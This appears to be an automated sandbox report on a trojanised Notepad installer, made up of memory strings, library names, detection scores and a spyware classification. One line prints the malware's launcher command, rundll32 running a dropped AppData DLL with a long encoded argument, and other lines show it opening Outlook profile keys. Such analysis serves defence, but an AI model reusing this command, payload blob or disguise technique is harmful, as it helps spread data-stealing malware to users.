              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245334588.00000000035F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameadvapi32.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245844802.00000000025D0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamerpcrt4.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.254291672.0000000003062000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSETUPAPI.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253433753.0000000002C1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSETUPAPI.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253383026.0000000000713000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePSAPIj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260362834.0000000000D3A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHCORE.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248576597.0000000002940000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263650614.0000000000726000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePROFAPI.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255043550.0000000000746000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCFGMGR32.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.247163570.00000000035F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp_win.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245469036.00000000025BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcrt.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253309097.0000000000D10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamews2_32.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.262323104.000000000334F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWindows.Storage.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263974980.0000000000715000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefilterLib.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244831412.0000000002504000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245986343.00000000035F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebcryptprimitives.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253224746.00000000035F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamews2_32.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263476814.000000000071D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel.appcore.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.252817024.0000000002902000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOLE32.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246070776.000000000072B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegdi32j% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248145801.000000000250C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs Notteppad_SettupX32iX64.exe
              Source: nsis_uns6283e8.dll.0.dr Static PE information: Number of sections : 11 > 10
              Source: Notteppad_SettupX32iX64.exe Static PE information: Section: .data ZLIB complexity 0.9993990384615384
              Source: Notteppad_SettupX32iX64.exe ReversingLabs: Detection: 19%
              Source: Notteppad_SettupX32iX64.exe Virustotal: Detection: 21%
              Source: Notteppad_SettupX32iX64.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown Process created: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming\nsis_uns6283e8.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8DWvAEoAUB8AbyMAZv8AcQBtAHUAQc8ATABOJwAtAVlI|4PsKOgEAgAA|0iDxCjDzMzM|0yJRCQYSIlUfyQQSIlMJAhdAf9Ii0QkMEiJBO0kgQE4SG8ACEjHt0QkEC0B6w6BARCvSIPAAY8BEIEBQNtIOZYAcyWfA4sM|yRIA8hIi8FI64tMqwFUewAD0Uj|i8qKCYgI68F+ZgVlSIsEJWDz8P8zyUiLUBhIO||RdDZIg8IgSP+LAkg7wnQqZv+DeEgYdRpMi|9AUGZBgzhrdN0HERFLdQgREHgQ|y50BUiLAOvV10iLSP0AwWoAQFP|VVZXQVRBVUH3VkFXXQFmgTlN|1pNi|hMi|JI34vZD4X88|BMY|9JPEGBPAlQRd8AAA+F6vPwQYv3hAmI8|CFwEiN3zwBD4TWahGDvLsJjC0BD4TH8|BE|4tnIESLXxyL|3ckRItPGEwD|+FMA9lIA|Ezf8lFhckPhKTz8P9Ni8RBixBFM||SSAPTigKEwP90HUHByg0Pvr3A+gABRAPQvxF1|+xBgfqq|A18|3QOg8EBSYPA|wRBO8lzaevG|4vBD7cMTkWL|yyLTAPrdFgzfe2qEHRRQYsUwQD|0zPJigJMi8Jv6w|BycgRA8jlEO8BQYoA1RDtM8A|M|ZBOwy24BCmAP+DxgGD+Ahy7v|rCkiLy0H|1b9JiQT3g8XkEMS|BDtvGHKvZgFB|19BXkFdQVxf915dWzMXSIHsYP0BZACL6ehm|v9||0iFwA+EmHUg60yNrwGLKxDIM||76Jt9II1fBEyN|0VGM9KLy|9U+yRogCBMi+APhPVrdSBFqBAzwIvTvpEgSIl8JCCmIHB+gCBIi|APhEt1IP6mIFBIjVYIRI2|R0BIjYwkhRFI34vY6Hz9fiCNVtVI3iAQ4iHM8|DoZ37vIESLBo1XCEEgeqYgWMohiYQkgIcS7d7z8IsO2iBYiYyxJHERBzCRIOgx7yCL|ZwtMkyLXTpIg|f7bEiKIDBMiWTfJDhMi6QaMkyJ3VyEAYQk3IcRhpJ2jRGNR0swjCTw8|C|SYvU6On8BTCK3Zx4MkiNhHgyQYD|8yGNT2xEMBj+pAKD6QF184G8|ngyIVJleHVNi3eEJPQiMZQk+DUB|8JIO9hyOIP6f2x2M0SNSUD6AE+UQbgAmACmIEDKIs|4dBlEtjDAMUmN91QkbJEgSYPobLvoa4IwSIvOpiB4|0iF|3QSi1VC+UyOMBsxSI1MJEAf|9dIgcR0IWEkLQgALQE=
              Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5152 -s 272
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe File created: C:\Users\user\AppData\Roaming\nsis_uns6283e8.dll
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/1@0/1
              Source: rundll32.exe, rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: rundll32.exe, rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: rundll32.exe, rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
              Source: rundll32.exe, rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: rundll32.exe, rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: rundll32.exe, rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006E9201 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,Process32NextW,StrCmpIW,CloseHandle,CloseHandle,0_2_006E9201
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
              Source: rundll32.exe String found in binary or memory: ./?.so;lua/lib/amd64/?.so;lua/lib/amd64/loadall.so
              Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook
              Source: Binary string: wkernel32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244881244.0000000002620000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.244831412.0000000002504000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248576597.0000000002830000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.248145801.000000000250C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcrt.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245563996.00000000025D0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245469036.000000000250D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wrpcrt4.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245765521.0000000002501000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245844802.00000000025D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000002.273050542.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.244109715.0000000002507000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shcore.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260362834.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.259962474.0000000002508000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.280113547.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wwin32u.pdbGCTL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.249955394.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: bcryptprimitives.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245986343.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: setupapi.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253433753.000000000283D000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.254291672.0000000002C80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246070776.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: advapi32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245334588.00000000035F9000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245378880.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: fltLib.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263974980.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wsspicli.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245915259.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cfgmgr32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255043550.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.289392390.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: shell32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wrpcrt4.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245765521.0000000002501000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245844802.00000000025D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msvcp_win.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.247163570.00000000035F9000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.247436363.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: psapi.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253383026.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.284854081.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246070776.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245144448.0000000002A20000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wimm32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251663261.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mpr.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255267191.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wwin32u.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.249955394.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wsspicli.pdbGCTL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245915259.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: setupapi.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253433753.000000000283D000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.254291672.0000000002C80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: combase.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.250112415.000000000283E000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.250519069.0000000002AA0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: gdi32full.pdb source: rundll32.exe, 00000001.00000003.280972629.0000025AA3B65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.282135570.0000025AA3CFD000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: win32u.pdb source: rundll32.exe, 00000001.00000003.280859396.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248576597.0000000002830000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.248145801.000000000250C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245144448.0000000002A20000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cryptbase.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245960559.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wuser32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248888902.000000000250B000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.249465359.0000000002830000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: shell32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wimm32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251663261.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: fltLib.pdbGCTL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263974980.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: imm32.pdb source: rundll32.exe, 00000001.00000003.283179571.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: gdi32full.pdbUGP source: rundll32.exe, 00000001.00000003.280972629.0000025AA3B65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.282135570.0000025AA3CFD000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32full.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246455497.00000000028AC000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.246110906.0000000002585000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: profapi.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263650614.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.293014153.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ws2_32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253309097.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.253224746.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msctf.pdbUGP source: rundll32.exe, 00000001.00000003.283688801.0000025AA3B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32full.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246455497.00000000028AC000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.246110906.0000000002585000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shcore.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260362834.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.259962474.0000000002508000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.280113547.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mpr.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255267191.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000002.273050542.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.244109715.0000000002507000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000001.00000003.269181411.0000025AA3900000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ole32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251971029.0000000002503000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.252817024.0000000002830000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.293112471.0000025AA3A1B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: powrprof.pdbUGP source: rundll32.exe, 00000001.00000003.293051816.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: powrprof.pdb source: rundll32.exe, 00000001.00000003.293051816.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msctf.pdb source: rundll32.exe, 00000001.00000003.283688801.0000025AA3B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wmswsock.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.264610622.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Windows.Storage.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260789377.0000000002833000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.262323104.0000000002E00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ole32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251971029.0000000002503000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.252817024.0000000002830000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.293112471.0000025AA3A1B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: win32u.pdbGCTL source: rundll32.exe, 00000001.00000003.280859396.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Kernel.Appcore.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263476814.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.292944490.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wkernel32.pdbGCTL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244881244.0000000002620000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.244831412.0000000002504000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: imm32.pdbUGP source: rundll32.exe, 00000001.00000003.283179571.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000001.00000003.269724498.0000025AA3818000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Kernel.Appcore.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263476814.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.292944490.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: psapi.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253383026.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.284854081.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msvcp_win.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.247163570.00000000035F9000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.247436363.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: advapi32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245334588.00000000035F9000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245378880.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cryptbase.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245960559.0000000000710000.00000004.00001000.00020000.00000000.sdmp
